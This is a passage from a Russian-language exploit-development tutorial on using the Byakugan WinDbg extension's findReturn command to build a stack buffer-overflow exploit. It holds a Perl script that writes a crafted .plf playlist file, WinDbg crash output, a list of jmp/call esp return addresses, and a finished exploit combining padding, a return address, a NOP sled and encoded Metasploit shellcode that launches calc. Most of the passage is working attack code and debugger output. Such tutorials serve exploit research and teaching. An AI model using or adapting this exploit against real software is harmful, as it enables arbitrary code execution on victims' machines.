Byakugan : findReturn

Мы увидели, что можно построить эксплойт прямо на RET, переписав его (на отметке 260). Давайте напишем скрипт, который продемонстрирует как использование findReturn, поможет нам написать работающий эксплойт:

Для начала, напишем скрипт с нагрузкой из 264 характеристик metasploit pattern, следующих с 1000 A’s:

my $sploitfile="blazesploit.plf";my $junk = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8... Ai7";my $junk2 = "A" x 1000;$payload =$junk.$junk2; open ($FILE,">$sploitfile");aprint $FILE $payload;close($FILE); open ($FILE2,">c:\\junk2.txt");print $FILE2 $junk2;close($FILE2);

При открытии sploitfile, windbg пишет следующее:

(c34.7f4): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.This exception may be expected and handled.eax=00000001 ebx=77f6c19c ecx=05a8dcd8 edx=00000042 esi=01f61c20 edi=6405569ceip=37694136 esp=0012f470 ebp=01f61e60 iopl=0 nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206<Unloaded_ionInfo.dll>+0x37694135:37694136?????

Найдем требуемую информацию для написания эксплойта с помощью арсенала byakugan:

• отследите metasploit pattern ($junk)
• отследите A’s ($junk2)
• посмотрите, где переписывается eip (изменяется)
• посмотрите. где находятся $junk и $junk2
• найдите обратные адреса

0:000>!load byakugan[Byakugan] Successfully loaded! 0:000>!jutsu identBuf msfpattern myJunk1 264[J] Creating buffer myJunk1. 0:000>!jutsu identBuf file myJunk2 c:\junk2.txt[J] Creating buffer myJunk2. 0:000>!jutsu listBuf[J] Currently tracked buffer patterns: Buf: myJunk1 Pattern: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0A... (etc) Buf: myJunk2 Pattern: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... (etc) 0:000>!jutsu hunt[J] Controlling eip with myJunk1 at offset 260.[J] Found buffer myJunk1 @ 0x0012f254[J] Found buffer myJunk2 @ 0x0012f460[J] Found buffer myJunk2 @ 0x0012f460 - Victim of toUpper! 0:000>!jutsu findReturn[J] started return address hunt[J] valid return address (jmp esp) found at 0x3d9572cc[J] valid return address (call esp) found at 0x3d9bb043[J] valid return address (jmp esp) found at 0x3d9bd376[J] valid return address (call esp) found at 0x4b2972cb[J] valid return address (jmp esp) found at 0x4b297591[J] valid return address (call esp) found at 0x4b297ccb[J] valid return address (jmp esp) found at 0x4b297f91[J] valid return address (call esp) found at 0x4ec5c26d[J] valid return address (jmp esp) found at 0x4ec88543[J] valid return address (call esp) found at 0x4ece5a73[J] valid return address (jmp esp) found at 0x4ece7267[J] valid return address (call esp) found at 0x4ece728f[J] valid return address (jmp esp) found at 0x4f1c5055[J] valid return address (call esp) found at 0x4f1c50eb[J] valid return address (jmp esp) found at 0x4f1c53b1[J] valid return address (call esp) found at 0x4f1c5aeb[J] valid return address (jmp esp) found at 0x4f1c5db1[J] valid return address (jmp esp) found at 0x74751873[J] valid return address (call esp) found at 0x7475d20f[J] valid return address (jmp esp) found at 0x748493ab[J] valid return address (call esp) found at 0x748820df[J] valid return address (jmp esp) found at 0x748d5223[J] valid return address (call esp) found at 0x755042a9[J] valid return address (jmp esp) found at 0x75fb5700[J] valid return address (jmp esp) found at 0x76b43adc[J] valid return address (call esp) found at 0x77132372[J] valid return address (jmp esp) found at 0x77156342[J] valid return address (call esp) found at 0x77506cca[J] valid return address (jmp esp) found at 0x77559bff[J] valid return address (call esp) found at 0x7756e37b[J] valid return address (jmp esp) found at 0x775a996b[J] valid return address (jmp esp) found at 0x77963da3[J] valid return address (call esp) found at 0x7798a67b[J] valid return address (call esp) found at 0x77b4b543[J] valid return address (jmp esp) found at 0x77def069[J] valid return address (call esp) found at 0x77def0d2[J] valid return address (jmp esp) found at 0x77e1b52b[J] valid return address (call esp) found at 0x77eb9d02[J] valid return address (jmp esp) found at 0x77f31d8a[J] valid return address (call esp) found at 0x77f396f7[J] valid return address (jmp esp) found at 0x77fab227etc...

Результаты:

• eip был перезаписан в ячейке 260 из myJunk1.
• myJunk2 (A’s) был найден в 0x0012f460 (which is esp-10). Т.е. если мы переместим eip с jmp esp, то начало нашего shellcode будет в myJunk2 + 10 байт (или 16 символов(characters))
• необходимо удалить последние 4 байта из $junk нашего скрипта, и добавить адрес (4 байта) jmp esp или call esp, который перезапишет RET. (Конечно, вам все еще нужно проверять адрес …). Мы используем 0x035fb847 в качестве примера (не показанный в программах выше; я все еще предпочитаю вручную выбирать использование обратных адресов, используя memdump или findjmp –просто потому что вы не можете увидеть модуль принадлежащий ‘findReturn’…
• нам необходимо
• переместить 1000 A’s с shellcode
• добавить в список 16 NOP’s перед shellcode (я добавил 50 nops … Если вы добавили меньше, то ваш shellcode упадет, что я проверил, используя memDiff)

Скрипт:

my $sploitfile="blazesploit.plf";my $junk = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6A...Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai"; #260 characters#$junk is now 4 byte shortermy $ret = pack('V',0x035fb847); #jmp esp from EqualizerProcess.dllmy $nop="\x90" x 50;# windows/exec - 302 bytes# http://www.metasploit.com# Encoder: x86/alpha_upper# EXITFUNC=seh, CMD=calcmy $shellcode="\x89\xe3\xdb\xc2\xd9\x73\xf4\x59\x49\x49\x49\x49\x49\x43"."\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58"."\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42"."\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"."\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58"."\x51\x54\x43\x30\x45\x50\x45\x50\x4c\x4b\x47\x35\x47\x4c"."\x4c\x4b\x43\x4c\x43\x35\x44\x38\x43\x31\x4a\x4f\x4c\x4b"."\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x47\x50\x45\x51\x4a\x4b"."\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x45\x51\x4a\x4e\x50\x31"."\x49\x50\x4c\x59\x4e\x4c\x4c\x44\x49\x50\x44\x34\x45\x57"."\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4b\x44"."\x47\x4b\x50\x54\x47\x54\x45\x54\x43\x45\x4a\x45\x4c\x4b"."\x51\x4f\x46\x44\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44\x4c"."\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c\x4b"."\x45\x4c\x4c\x4b\x43\x31\x4a\x4b\x4d\x59\x51\x4c\x46\x44"."\x43\x34\x49\x53\x51\x4f\x46\x51\x4b\x46\x43\x50\x46\x36"."\x45\x34\x4c\x4b\x50\x46\x50\x30\x4c\x4b\x51\x50\x44\x4c"."\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c\x4b\x42\x48\x43\x38"."\x4b\x39\x4a\x58\x4d\x53\x49\x50\x43\x5a\x50\x50\x43\x58"."\x4c\x30\x4d\x5a\x45\x54\x51\x4f\x42\x48\x4d\x48\x4b\x4e"."\x4d\x5a\x44\x4e\x50\x57\x4b\x4f\x4b\x57\x43\x53\x43\x51"."\x42\x4c\x43\x53\x43\x30\x41\x41"; $payload =$junk.$ret.$nop.$shellcode; open ($FILE,">$sploitfile");print $FILE $payload;close($FILE);